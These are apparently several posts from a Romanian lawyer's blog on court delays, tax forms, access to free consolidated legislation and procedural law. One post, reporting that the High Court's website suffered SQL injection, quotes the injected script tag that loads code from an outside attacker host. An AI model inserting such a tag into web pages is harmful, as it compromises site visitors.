Jurnal de avocat: protestul judecătorilor


Luni, 12 septembrie 2016

Am deplasare de la Craiova la Râmnicu Vâlcea pentru o ședință de judecată la tribunal care începe la 08:30.

04:30: Trezire. Pregătire…
05:30: Plec spre Râmnicu Vâlcea.
07:45: Ajung la Râmnicu Vâlcea (drum liber, pândarii din Loganul albastru de la Strejești nu au așezat pe poziții încă).
08:15: Intru în Tribunalul Vâlcea. Îmi găsesc sala și poziția pe listă. Aștept jandarmul să deschidă ușa sălii.
08:35: Se deschide sala. Intră grefiera cu dosarele. Surpriză! Nu e completul Ap2, ci Ap1, care are aceeași oră de început (am înțeles că e o practică a acestui tribunal să anunțe mai multe ședințe la aceeași oră, cu toate că nu are tot atâtea săli disponibile – timpul nostru are preț… iar acesta este 0). Mă uit iar la lista mea: ora de început (08:30 – din citație și de pe portal) e tăiată cu pixul și tot cu pixul este scrisă o nouă oră – 11:00.Jpeg
08:45: Intră judecătorii. Bine-dispuși, parcă ne pregătesc o surpriză. Încep să strige dosarele și le amână pe toate. „E protestul judecătorilor.” Sunt discriminați și asupriți de puterea executivă.
09:20: Se termină ședința. Mai aștept vreo 10 min. Poate intră cumva și completul Ap2. Nu am noroc. Nu-mi rămâne decât să mă întorc la mașină și să aștept până la ora modificată.
10:45: Revin în sală și aștept…
11:50: Intră grefiera cu dosarele. Cer dosarul meu. „Nu am acest dosar.”, „Ce complet intră?”, „Falimente”, „Și completul Ap2?”, „Nu știu. Vorbiți cu grefiera. Camera 7, sub scară.” Merg la grefieră. Îmi spune că ședința completului Ap2 a început la 10:30 și s-a terminat, dar să nu-mi fac griji că toate dosarele s-au amânat, deci „nu este niciun prejudiciu” (wtf?!) „Și eu cum mă justific față de client? Am bătut cu noaptea-n cap drumul de la Craiova și nici măcar nu am depus împuternicirea și apar ca fiind lipsă?! De ce nu ați scris iar pe listă noua modificare a orei?”, „Judecătorii nu au mai avut răbdare și oricum se amânau toate dosarele…”, „Aș vrea măcar să depun împuternicirea.”, „Depuneți-o prin registratură.” Scriu de mână un fel de adresă de înaintare la care atașez împuternicirea, îi fac o copie (0,40 lei/pagină la xerox-ul tribunalului, fără bon fiscal, bineînțeles… că isteria bonurilor a trecut deja și lucrurile se reașază pe făgașul lor „normal”) și apoi merg la registratură.
12:15: La registratură pun hârtiile pe masă și cer să fie înregistrate. „A plecat colega cu mapa. S-a terminat programul cu publicul. Trebuia să veniți mai devreme.”, „(?^(&%!)”, „Se mai pot depune numai cu acordul președintelui de secție, dar e în ședință.” Îi explic povestea zilei mele că poate pricepe absurdul situației. „Înțeleg, dar trebuie să ne înțelegeți și dvs. că nu putem face orice de capul nostru. Nu vreau să existe bănuieli că am favorizat pe cineva…” Până la urmă, după atâtea parlamentări, o altă funcționară se oferă să mă ajute, cu condiția să menționez olograf pe cerere că am depus-o după ședință și să semnez… mă asigur că și ea semnează pe copia mea. Plec spre birou. Mai pierd vreo două ore pe drum, doar pentru a spune o nouă poveste despre justiția noastră independentă și în folosul cetățeanului.
Mâine am iar deplasare la Tribunalul Vâlcea. Urmează probabil cea mai previzibilă soluție a unei instanțe: amânare pentru că e protest…

P.S. Pentru cine nu crede că „e prejudiciu”, să facă un exercițiu de empatie: dacă eram avocatul lui și trebuia să mă prezint la termen, pe cheltuiala lui, cum i s-ar fi părut să plătească? Și cum i s-ar fi părut să piardă mai bine de o jumătate din ziua de lucru pentru o deplasare total inutilă?

P.P.S. „1. Justiția trebuie să aibă ca și preocupare esențială protecția, promovarea și garantarea tuturor drepturilor și libertăților cetățenești. În fața judecătorului cetățeanul este egal cu statul.” (Memorandum privind situatia justitiei in 2016 votat in Adunarile Generale)… vasăzică am pierdut o zi din viață pentru că judecătorii tocmai se preocupau de garantarea drepturilor cetățenești.

Reclame

Scurtă plimbare prin iadul fiscal românesc – declarația 392B


Citeam că nedepunerea la termen a declarațiilor 392A și 392B se sancționează cu niște amenzi deloc de neglijat. Chiar și baroul are un anunț. Simțindu-mă vizat de obligația de declarare respectivă am urmat un pic firul textelor normative pentru a înțelege mai bine de ce, cum etc.

Am vizitat pagina ANAF indicată și în articol. Am descărcat progrămelul oferit de ANAF (D392_2011). Nu e locul aici să comentez despre programul oferit de ANAF – despre faptul că în universul lor există numai Windows și .exe, că aspectul aplicației trece cu un bocanc sovietic peste orice înseamnă interfață grafică modernă, stil, ergonomie, comportament intuitiv etc.

Am mai navigat pe sait până am ajuns la o pagină din care să descarc și declarația în format PDF – declarația 392B se referă la persoane impozabile neînregistrate în scopuri de TVA și care nu îndeplinesc condițiile de plafon etc. pentru TVA (cazul meu).

Declarația 392B este prevăzută de Ordinul președintelui Agenției Naționale de Administrare Fiscală nr. 1081/2011 pentru aprobarea modelului și conținutului unor formulare de declarații informative (publicat în Monitorul Oficial, Partea I, nr. 103/2011). În anexa la ordin sunt enunțate instrucțiunile de completare. Acolo găsesc câteva noțiuni precum: „Cifra de afaceri”, „Livrări de bunuri și prestări de servicii”, „Jurnalul pentru vânzări”, „Achiziții”, „Jurnalul pentru cumpărări”. Chiar dacă, realist vorbind, nu ne putem aștepta ca legea să aibă precizia unei definiții din matematică, totuși noțiunile utilizate într-un act normativ (unul fiscal!) nu ar trebui să fie deloc vagi, ci suficient de clare încât să permită contribuabilului să își cunoască exact obligațiile și drepturile – v. articolul 3 din Codul fiscal sau considerente din jurisprudența CJUE precum C-143/93 Gebroeders van Es Douane Agenten BV c. Inspecteur der Invoerrechten en Accijnzen, paragraful 27, sau T-115/94 Opel Austria GmbH c. Consiliul Uniunii Europene, paragraful 124; v. și jurisprudența CEDO – Cauza Rotaru contra României, paragraful 55. Așadar, presupunem că fiecare din noțiunile enumerate are o semnificație îndeajuns de clară încât să putem opera cu ea.

Ca avocat neplătitor de TVA și obligat să țin contabilitatea în partidă simplă nu îmi sunt familiare cele două registre contabile din care ar trebui să preiau datele pentru declarația 392B; registrul-jurnal de încasări și plăți este singurul pe care l-am completat până acum. Apropo de reglementarea privind contabilitatea în partidă simplă, în acel ordin din 2004 se fac trimiteri către Hotărârea Guvernului nr. 831/1997 pentru aprobarea modelelor formularelor comune privind activitatea financiară și contabilă…. În prezent acele trimiteri nu mai duc nicăieri întrucât hotărârea de Guvern a fost abrogată în 2009, fără a mai fi prevăzut altceva în loc.

La o căutare pe Internet după „jurnal pentru vânzări” și „jurnal pentru cumpărări” găsesc Ordinul Ministrului Finanțelor Publice nr. 425/1998 (publicat în Monitorul Oficial, Partea I, 391bis/1998).

În acest act normativ cele două jurnale au chiar și coduri: 14-6-12/a (Jurnalul pentru vânzări) și 14-6-17/b (Jurnalul pentru cumpărări). Verific apoi dacă ordinul mai este în vigoare. Se pare că nu. A fost abrogat de Ordinul Ministrului Finanțelor Publice nr. 1850/2004. Și el a fost abrogat – v. Ordinul Ministrului Economiei și Finanțelor nr. 3512/2008 (publicat în Monitorul Oficial, Partea I, nr. 870bis/2008). Abia acesta este actul aflat în vigoare în prezent, fiind modificat prin Ordinul Ministrului Finanțelor Publice nr. 2869/2010. Cele din urmă ordine nu mai au în conținutul lor reglementări referitoare la cele două jurnale buclucașe.

Cu puțin noroc, continuând căutarea pe Internet, găsesc o referire la actul normativ care ar reglementa jurnalele: Ordinul Ministrului Economiei și Finanțelor nr. 1372/2008 (publicat în Monitorul Oficial, Partea I, nr. 364/2008). În mărinimia emitentului, persoanele impozabile sunt lăsate să aprecieze asupra modului în care își vor ține evidența „corectă și completă” (v. în special articolul 1 alineatele (3)-(4) și articolul 2). Textul prevede că persoanele impozabile pot să folosească modelele orientative incluse în anexe. Este limpede că aceste persoane pot la fel de bine să nu folosească niciun fel de evidență de tipul jurnalului pentru vânzări și a celui pentru cumpărări. Își țin evidența în registrul-jurnal de încasări și plăți sau în formă electronică, declară și plătesc impozitele cu grija cetățeanului naiv… Și așa trece timpul până când își mai aduce aminte vreun ministru sau șef al ANAF că din hățișul de declarații și formulare existente deja în circulație parcă lipsește totuși ceva… o informativă care să fie completată folosind date dintr-un registru opțional… Și dă sfară în țară că pentru nedepunerea declarației 392B fiscul va amenda drastic contribuabilii indisciplinați care țineau cu orice preț să eludeze ansamblul coerent, simplu, clar, public și accesibil al reglementărilor fiscale.

Bineînțeles, s-au erodat demult așteptările ca legislația noastră să fie clară și redactată coerent, așa că îmi voi completa declarația folosind datele din registrul-jurnal de încasări și plăți. E un pic mai complicat să clasific în vreo categorie onorariile retrocedate de maestru – reprezintă ele contraprestația unei prestări de servicii? Plata unor taxe/contribuții către barou, CAA, INPPA, bugetul de stat este o „achiziție”? La fel, în lipsa jurnalelor pentru vânzări și cumpărări, e foarte complicat să calculez suma „achizițiilor” de la plătitori de TVA. Nicio problemă, dacă voi greși, fiscul va avea grijă să mă disciplineze pentru declarația care nu ar fi corectă și completă…

Legislație gratuită, integrală și actualizată? Caz concret


Într-un text recent afirmam că e necesar ca orice modificare a unui act normativ să fie urmată imediat și automat de o consolidare a acestuia, astfel încât, pentru orice dată în care acest act este în vigoare, oricine să poată consulta forma integrală a actului.

Nu a trecut prea mult timp de atunci că ne-am și confruntat la cabinet cu un caz care ilustrează necesitatea accesului gratuit la legislația integrală și actualizată în mod oficial.

Este vorba despre suspendarea de drept a raportului de serviciu al unui funcționar public, ca urmare a angajării acestuia la cabinetul unui demnitar – v. articolul 94 alineatul (1) litera b) din Legea 188/1999 privind Statutul funcționarilor publici.
Problema concretă: care era forma în vigoare a legii în luna noiembrie 2011?

De ce nu folosești un produs informatic cu legislația României?
Am apelat la informațiile provenite din trei asemenea produse, printre cele mai respectabile din piață. În mod cu totul surprinzător, fiecare dintre cele trei prezintă o formă proprie pentru articolul menționat mai sus, valabilă în aceeași perioadă.

Potrivit aplicației Legis, produsă de CTCE Piatra Neamț, litera b) a fost abrogată. Pentru a explica această stare, produsul respectiv include și o opinie formulată de Agenția Națională a Funcționarilor Publici.

Potrivit aplicației Indaco Lege4, produsă de Indaco Systems, litera b) avea următorul conținut:

b) este încadrat la cabinetul unui demnitar;

Potrivit aplicației Legalis, litera b) avea un alt conținut:

b) este încadrat la cabinetul unui demnitar, la cabinetul unui primar sau, după caz, la cabinetul unui președinte al consiliului județean ori la cancelaria prefectului;

Toate aceste texte sunt cele rezultate după consolidarea textului Legii 188/1999 (neoficial, bineînțeles), ultima modificare inclusă fiind cea efectuată prin Legea-cadru 284/2010.

Această situație are la origine o tehnică legislativă defectuoasă, lăsată fără nicio sancțiune de Legea 24/2000, care reglementează generic tehnica legislativă. Nu poate fi imputat furnizorilor de programe de legislație că din toate interpretările posibile fiecare a ales câte una – a funcționat o altă lege, a lui Murphy: Tot ceea ce poate merge prost va merge prost.

Pe scurt, firul modificărilor Legii 188/1999, relevante în speță, ar fi:

  1. legea a fost republicată în 2007; forma textului de la litera b) coincidea cu forma afișată de Indaco Lege4;
  2. prin OUG 105/2009 a fost modificat articolul 94 alineatul (1) litera b), fiind adăugate câteva noi situații de angajare a unui funcționar public, avută în vedere la suspendarea de drept a raportului său de serviciu; forma textului de la litera b) coincidea cu forma afișată de Legalis;
  3. prin Legea 140/2010 erau efectuate modificări direct asupra Legii 188/1999, iar printr-o prevedere referitoare strict la OUG 105/2009 erau abrogate câteva prevederi din aceasta, inclusiv buclucașa literă b); acest rezultat coincide cu cel afișat în aplicația Legis;
  4. abia prin Legea 264/2010 era aprobată cu modificări OUG 105/2009.

Avem o legislație stufoasă și instabilă, cu multe hibe din perspectiva tehnicii legislative (v. paralelisme, prevederi incomplete și interpretabile, modificări ale modificărilor etc.). Aceasta nu este nici măcar accesibilă publicului în mod gratuit. Tot ce ne lipsea, pentru un tablou complet al insecurității juridice, era să fim nevoiți să aflăm prin forțe proprii forma aplicabilă a legii la o dată specificată.

P.S.: Ca o completare la textul anterior, Regia Autonomă „Monitorul Oficial” are deja produsul informatic atât de râvnit: Expert Monitor. Dacă ținem cont de descrierea producătorului, această aplicație este exact ceea ce solicitau și parlamentarii care inițiaseră lăudabilul proiect menționat anterior. Singura problemă actuală este costul.

Ne trebuie o legislație gratuită, integrală și actualizată!


Cu aproape doi ani în urmă am primit un neașteptat cadou din partea unei persoane pe care nu o cunoșteam (detaliile rămân la purtător; chiar și pentru o mențiune ca asta s-ar putea să-mi reproșeze că a devenit o notă de subsol… 🙂 ). Cadoul era un colet cu niște DVD-uri cuprinzând în format PDF toate edițiile Monitorului Oficial, partea I, din 1989 până la data curentă. Îmi este de mare folos, mai ales în activitatea de zi cu zi la cabinet.

Am avut surpriza să găsesc respectiva colecție și pe un sait despre care rotld.ro spunea că numele de domeniu este înregistrat de domnul Andrei Săvescu (avocat, coordonator al juridice.ro): www.moficial.ro.
Colecția era publicată în cea mai brută formă posibilă, serverul generând o listă simplă a documentelor, grupate pe ani. Fără reclame, fără nume, fără stiluri, fără asocieri cu vreo persoană.
Am mai descoperit apoi că aceeași rețetă era folosită și de saitul www.kurtyan.org, cu diferența că acesta cuprinde toate părțile publicației oficiale a statului (I-VII):

  • I – acte ale parlamentului, ale guvernului, ale miniștrilor, ale unor instanțe și autorități centrale etc.;
  • II – acte privind activitatea parlamentară;
  • III – diverse acte juridice, înscrisuri, comunicări etc.;
  • IV – acte juridice referitoare la operatori economici sau alte persoane juridice;
  • V – contracte colective de muncă, convenții și recomandări ale Organizației Internaționale a Muncii;
  • VI – anunțuri privind achizițiile publice;
  • VII – publicații ale societăților cooperative.

Am aflat apoi și de conflictul dintre Regia Autonomă Monitorul Oficial (RAMO) și domnii Andrei Săvescu și Alberto Kurtyan. Pe scurt, RAMO a sesizat organele de urmărire penală cu privire la încălcarea unor drepturi de proprietate intelectuală pe care regia le-ar avea asupra Monitorului Oficial; detalii aici:

Cumva pentru a evita eventuale pretenții ale RAMO referitoare la formatul „protejat” al Monitorului Oficial, alți prieteni au inițiat pe cheltuiala și munca lor un alt sait – civvic.ro – care are un scop pe cât de generos, pe atât de greu de atins: publicarea în mod gratuit a conținutului Monitorului Oficial într-un format text, ușor de prelucrat prin mijloace electronice (spre deosebire de formatul PDF oferit de RAMO). Nu e prima lor „abatere”. Dacă utilizați dexonline.ro, ați făcut deja cunoștință cu munca lor.

E de prisos să reiau o întreagă justificare a legitimității publicării în mod gratuit a Monitorului Oficial. Au făcut-o alții mai pricepuți înainte.
E clar ca lumina zilei că legea este o informație de interes public, care trebuie să fie accesibilă oricui și că e datoria statului să depună toate eforturile necesare pentru cunoașterea ei. Felul în care stau lucrurile acum nu poate continua prea mult. Nu trebuie ratat prilejul real de dezbatere oferit de conflictele cu RAMO ale celor doi juriști. Poate că prin emisiunile de pălăvrăgeală continuă de la TV se va găsi și niște loc pentru discutarea unei probleme care, indirect sau direct, îi afectează pe toți cei care trăiesc în această țară.

Poate așa află și concetățenii noștri că, potrivit autorităților statului, legislația trebuie să fie o afacere și nu un bun comun, dar, în același timp, nimeni nu poate invoca în fața vreunei autorități că nu a cunoscut legea (cine nu cunoaște celebra zicere nemo censetur ignorare legem?).
Legislația, în viziunea reprezentanților statului, trebuie să fie o colecție de PDF-uri sau de coli de proastă calitate, trântite aproape zilnic, cuprinzând o mulțime de modificări ale modificărilor, pentru care cetățenii trebuie să aibă respect și să plătească abonamente piperate la tiparnița de legi.

O regulă banală a dreptului românesc este aceea că se aplică legea în vigoare la momentul realizării unui act sau fapt juridic. Dacă, de pildă, pentru fapte petrecute în 2006, am nevoie de textul în vigoare la acea dată al vreunei monstruozități normative (ex. Legea 247/2005, Legea 571/2003, Legea 161/2003 etc. etc., ca să nu mai vorbim despre aberantele norme metodologice – v. cele ale Codului fiscal pentru o idee de legislație secundară a la România…), am ghinion. Trebuie să răscolesc colecția de hârtii sau PDF-uri cu Monitorul Oficial și să pun cap la cap forma de atunci a legii care m-ar interesa. Și cum la noi modificările nu numai că sunt prea frecvente, dar sunt și haotice, e greu să îți dai seama dacă la o anume dată nu exista cumva vreo ordonanță de urgență a cărei lege de aprobare o modifica (lege la rândul ei modificată de o altă ordonanță…). De un real ajutor în asemenea încercări ar fi Baza de date legislativă oferită gratuit de Camera Deputaților. Acolo îți poți face o idee despre actele care au modificat o lege. Defectul ei: nu e întotdeauna completă și actualizată. Chiar și așa, este enorm timpul pierdut pentru compilarea unui text normativ, în scopul de a afla forma aplicabilă la o anume dată.
Avem calculatoare, Internet, tehnologii care ușurează viața etc., dar statul nostru continuă să prefere și să impună formele secolului trecut (v. dependența de hârtie, taxele pentru orice, timbrele fiscale și judiciare, ștampilele, dischetele, ghișeul cu ușiță de geam…).

„De ce nu cumperi un produs informatic cu legislația României?” De ce ar trebui? Legislația e obligatorie; ar trebui ca și un abonament la un produs software (oficial sau neoficial) să fie obligatoriu? Plătim deja impozite suficient de mari încât RAMO să aibă resurse pentru a face un sait în care să afișeze, fără restricții, abonamente, taxe sau tarife, tot ceea ce este public și obligatoriu pentru noi. Nu e însă de ajuns. Ceea ce ne oferă trebuie să beneficieze de toată încrederea că reprezintă un act oficial. Mai mult, orice modificare a unui act normativ trebuie să fie urmată imediat și automat de o consolidare a acestuia, astfel încât, pentru orice dată în care acest act este în vigoare, oricine să poată consulta forma integrală a actului, în multiple formate (ex. HTML, PDF). Aș avea de adăugat și o propunere de versionare a actelor normative, inspirată din sisteme de „revision control” – de discutat cu altă ocazie.
Repet exemplul pe care îl menționez adesea: Legifrance – serviciul public francez de difuzare a dreptului prin Internet.

Așa ceva a fost deja cerut și de inițiatorii unui proiect legislativ respins în ambele camere ale parlamentului. Acea inițiativă poate fi îmbunătățită, evitând criticile formale ale guvernului și realizând un obiectiv de interes pentru toți cetățenii. Un astfel de obiectiv îl are și apelul public făcut de juridice.ro: Legislatia Romaniei: Gratuit si Integral. Printre semnatari se află, probabil în majoritate, juriști (avocați, consilieri juridici, judecători etc.) care au avut suficiente ocazii să constate că e nevoie de o schimbare esențială a felului în care statul român comunică legislația.

Cei doi domni menționați mai sus au făcut un serviciu publicului. Și-au asumat riscul de a publica gratuit ceea ce statul ar fi trebuit să publice gratuit și riscul de a fi hărțuiți prin procese de RAMO. Pentru acest curaj și pentru beneficiile pe care le au vizitatorii saiturilor lor merită recunoștința și susținerea noastră, nicidecum amenzi sau condamnări penale.

Citește și:
Inflația legislativă în România
Goliat

www.scj.ro a primit o injecție cu SQL


Încercam să aflu ceva de pe saitul Înaltei Curți de Casație și Justiție (denumit, foarte românește, folosind inițialele de la Supreme Court of Justice… până la urmă We’re all living in America, nu?).

Lista de ședințe nu funcționează. Văzând ceea ce era afișat, bănuiam că vreun dorel nu a închis cum trebuie niște ghilimele prin sursă. Încerc să aflu despre ce e vorba și văd ceva și mai drăgălaș: <script src=”http://lilupophilupop.com/sl.php”></script&gt;. O căutare pe Google lămurește problema – injecție SQL. ECRIS (versiunea anacronică, din 2005, pentru Î.C.C.J.) se pare că e vulnerabil. Cam cât de romantic ar fi ca și ECRIS IV, folosit de restul instanțelor din țară, să aibă astfel de vulnerabilități?…

Curtea de Apel București se fălește deja cu un nou sait (se putea mai bine… părerea mea), pe când unul nou, funcțional și util și la Î.C.C.J.?

La mulți ani!

Completare (4 ianuarie 2012): S-a reparat.

Citește și:
ECRIS – este bun, dar poate fi și mai bun

Ce lipsește din legea contenciosului administrativ?


Cum să omori muște cu bomba atomică

După ce România a devenit stat membru al Uniunii Europene (1 ianuarie 2007) Legea 554/2004 a contenciosului administrativ a fost modificată, printre altele fiind adăugat un caz special de revizuire (v. articolul 21:2), pe lângă cele din dreptul comun (v. articolul 322 din Codul de procedură civilă):

(2) Constituie motiv de revizuire, care se adaugă la cele prevăzute de Codul de procedură civilă, pronunțarea hotărârilor rămase definitive și irevocabile prin încălcarea principiului priorității dreptului comunitar, reglementat de art. 148 alin. (2), coroborat cu art. 20 alin. (2) din Constituția României, republicată. Cererea de revizuire se introduce în termen de 15 zile de la comunicare, care se face, prin derogare de la regula consacrată de art. 17 alin. (3), la cererea temeinic motivată a părții interesate, în termen de 15 zile de la pronunțare. Cererea de revizuire se soluționează de urgență și cu precădere, într-un termen maxim de 60 de zile de la înregistrare.

Scopul evident al acestei noi prevederi era acela de a oferi un remediu pentru cazurile în care instanțele naționale au pronunțat hotărâri irevocabile care încalcă principiul priorității dreptului comunitar (dreptul Uniunii Europene). Criticabil ar fi faptul că acest remediu este prevăzut numai în contextul contenciosului administrativ. Or, dreptul comunitar poate fi încălcat și în alte ramuri de drept, acolo neputându-se folosi cazul special de revizuire prevăzut de Legea 554/2004.
Nu cunosc rata de succes a revizuirilor bazate pe acest caz special. Pot bănui că majoritatea lor au fost respinse (ex. hotărârile atacate „nu evocau fondul”, instanțele nu au constatat o încălcare a dreptului comunitar etc.). Totuși, fie și teoretic și iluzoriu, era un mijloc pus la dispoziția justițiabililor.

Prin Decizia 1.609/2010 a Curții Constituționale a fost admisă excepția de neconstituționalitate privind teza a doua a alineatului citat mai sus – fraza referitoare la termenul de introducere a cererii de revizuire. În această situație a devenit aplicabil textul articolului 33 din Legea 47/1992 (suspendarea efectelor juridice ale normei neconstituționale pentru 45 de zile, urmată de încetarea efectelor după expirarea acestui termen).

Proiectul de modificare a Legii 554/2004 a ajuns în dezbatere parlamentară mai întâi în Camera Deputaților. Forma inițiatorului, adoptată tacit de Cameră (în aprilie 2011), clarifica textul criticat de Curtea Constituțională: „(…) Hotărârea se comunică părții interesate în termen de 30 de zile de la pronunțare. Cererea de revizuire se introduce în termen de 15 zile de la comunicare (…)”.
Apoi a venit rândul Senatului (aveți răbdare cu pagina web…). Comisia juridică din Senat a hotărât, pe baza unei motivări criticabile, cu referiri mai ales la noul Cod de procedură civilă (Legea 134/2010 – adoptată, dar a cărei intrare în vigoare e lăsată în incertitudine), că întregul alineat (2) trebuie abrogat.
Senatul a adoptat proiectul și astfel, prin Legea 299/2011, alineatul (2) al articolului 21 din Legea 554/2004 a fost abrogat.

P.S. În actuala așezare, camera decizională poate modifica total și esențial un proiect primit de la prima cameră sesizată, această modificare devenind lege, indiferent de dezbaterile, propunerile, timpul pierdut etc. din prima cameră.

Excepția de neconstituționalitate mai suspendă procesul?


Într-o speță recentă instanța a invocat din oficiu o excepție de neconstituționalitate, dispunând suspendarea procesului (v. articolul 244:1.1 din Codul de procedură civilă) până la pronunțarea unei decizii a Curții Constituționale. Până aici nu ar fi nimic neobișnuit (dacă am privi la detalii, ar fi: (1) Legea 119/2010 mai fusese deja analizată de Curte, fiind declarată constituțională prin Deciziile 871/2010 și 873/2010; era foarte improbabil să revină asupra jurisprudenței sale; (2) instanța a trecut cu mare ușurință peste orice obiecții ale părților, ținând neapărat să suspende procesul până la rezolvarea unei excepții invocate din oficiu). Așa cum era de așteptat, Curtea Constituțională a respins excepția amintită, repetată în cadrul mai multor cauze (v. ședința din 27 septembrie 2011).

Mecanismul suspendării procesului are un temei de necontestat: dacă o pretenție supusă judecății ar fi afectată de neconcordanța unei legi cu prevederile Constituției, procesul trebuie oprit până când se pronunță instanța competentă să verifice constituționalitatea legilor. Acest mecanism era prevăzut explicit în Legea 47/1992 privind organizarea și funcționarea Curții Constituționale, în forma avută până la modificările din 2010:

Articolul 29
(5) Pe perioada soluționării excepției de neconstituționalitate judecarea cauzei se suspendă.

De-a lungul timpului, excepția de neconstituționalitate a devenit un mijloc facil de prelungire a proceselor. Cauzele erau suspendate, indiferent cât de inconsistente erau criticile de neconstituționalitate. Nu conta nici măcar dacă aceleași texte legale mai fuseseră deja analizate de Curtea Constituțională, toate excepțiile trebuie analizate cu aceeași atenție. Și așa, „reușita” invocării unei astfel de excepții „câștiga” câteva luni bune până când excepția ajungea să fie efectiv discutată, plus alte luni până la pronunțare, motivare și publicare în Monitorul Oficial.

În 2010, Legea 47/1992 a fost modificată prin Legea 177/2010 pentru modificarea și completarea Legii nr. 47/1992 privind organizarea și funcționarea Curții Constituționale, a Codului de procedură civilă și a Codului de procedură penală al României. Această lege abroga articolul 29:5 (citat mai sus) din Legea 47/1992 și adăuga noi cazuri de revizuire în Codul de procedură civilă (v. articolul 322:10) și în Codul de procedură penală (articolul 4082). Cazurile adăugate se referă la posibilitatea de a revizui o hotărâre după ce Curtea Constituțională s-a pronunțat, declarând ca neconstituțională o prevedere legală, incidentă în cauză.
Or, revizuirea este o cale de atac extraordinară care privește hotărâri rămase definitive în apel sau prin neapelare ori hotărâri pronunțate în recurs când se evocă fondul (în materie civilă), respectiv, hotărâri definitive (în materie penală). În esență, revizuirea poate fi cerută atunci când, după o judecată cu efecte definitive, se descoperă împrejurări necunoscute în timpul soluționării cauzei, care au afectat temeinicia sau legalitatea hotărârii atacate (ex. un martor a săvârșit infracțiunea de mărturie mincinoasă, un înscris utilizat a fost declarat fals, un membru al completului de judecată a comis o infracțiune în legătură cu cauza, cel puțin două hotărâri judecătorești definitive nu se pot concilia…).

Ajungem la o problemă de interpretare a voinței Legislativului. Dacă acesta ar fi intenționat menținerea posibilității de suspendare a cauzei până la pronunțarea Curții Constituționale ar fi fost imposibil ca în cauza în care a fost ridicată excepția de neconstituționalitate să fie pronunțată o hotărâre care să devină definitivă, întrucât judecata ar fi fost suspendată.
Din interpretarea dispozițiilor principale ale Legii 177/2010 (abrogarea articolului care prevedea suspendarea judecății și introducerea unor noi cazuri de revizuire) reiese că Legislativul a intenționat reducerea posibilității de tergiversare a proceselor prin invocarea excepției de neconstituționalitate, fapt care este confirmat în mod neîndoielnic și de expunerea de motive atașată proiectului Legii 177/2010, disponibil pe pagina de Internet a Camerei Deputaților: „(…) nu este mai puțin adevărat faptul că invocarea excepțiilor de neconstituționalitate de către părți este folosită de multe ori ca modalitate de a întârzia judecarea cauzei. Numărul extrem de ridicat al dosarelor aflate pe rolul Curții Constituționale ca urmare a invocării frecvente a excepțiilor de neconstituționalitate face ca soluționarea acestora să dureze extrem de mult, în detrimentul celerității judecății cauzelor. (…) Apreciind că este necesară o soluție care să corespundă acestei realități propunem eliminarea posibilității suspendării cauzei în cazul sesizării Curții Constituționale (…) 2. Schimbări preconizate – Principala prevedere a proiectului constă în eliminarea suspendării judecării cauzei în cazul invocării excepției de neconstituționalitate”.

Cu toate acestea, suspendarea procesului a fost dispusă potrivit dreptului comun (v. articolul 244:1.1 din Codul de procedură civilă: „Instanța poate suspenda judecata: 1. când dezlegarea pricinii atârnă, în totul sau în parte, de existența sau neexistența unui drept care face obiectul unei alte judecăți;”).

De ce mai era nevoie de vechea prevedere explicită privind suspendarea (v. articolul 29:5 din Legea 47/1992, forma veche), dacă măsura era posibilă și conform procedurii comune?

Dacă scopul Legii 177/2010 este cel declarat în expunerea de motive menționată, nu era oare mai simplu ca în loc de abrogarea alineatului (5) de la articolul 29, să fie făcută o modificare explicită, de pildă: „Pe perioada soluționării excepției de neconstituționalitate judecarea cauzei nu se suspendă.”?

Completare – 27.11.2011: Față de Legea 177/2010 au fost formulate obiecții de neconstituționalitate supuse controlului a priori al Curții Constituționale. Curtea le-a respins printr-o decizie (1.106/2010) publicată în același număr al Monitorului Oficial ca și legea (MO 627/2010). Considerentele Curții sunt interesante.

P.S. Efectul dilatoriu al excepției de neconstituționalitate poate fi cu ușurință transferat unui nou instrument: trimiterea preliminară către Curtea de Justiție a Uniunii Europene (v. Evidența trimiterilor preliminare din România).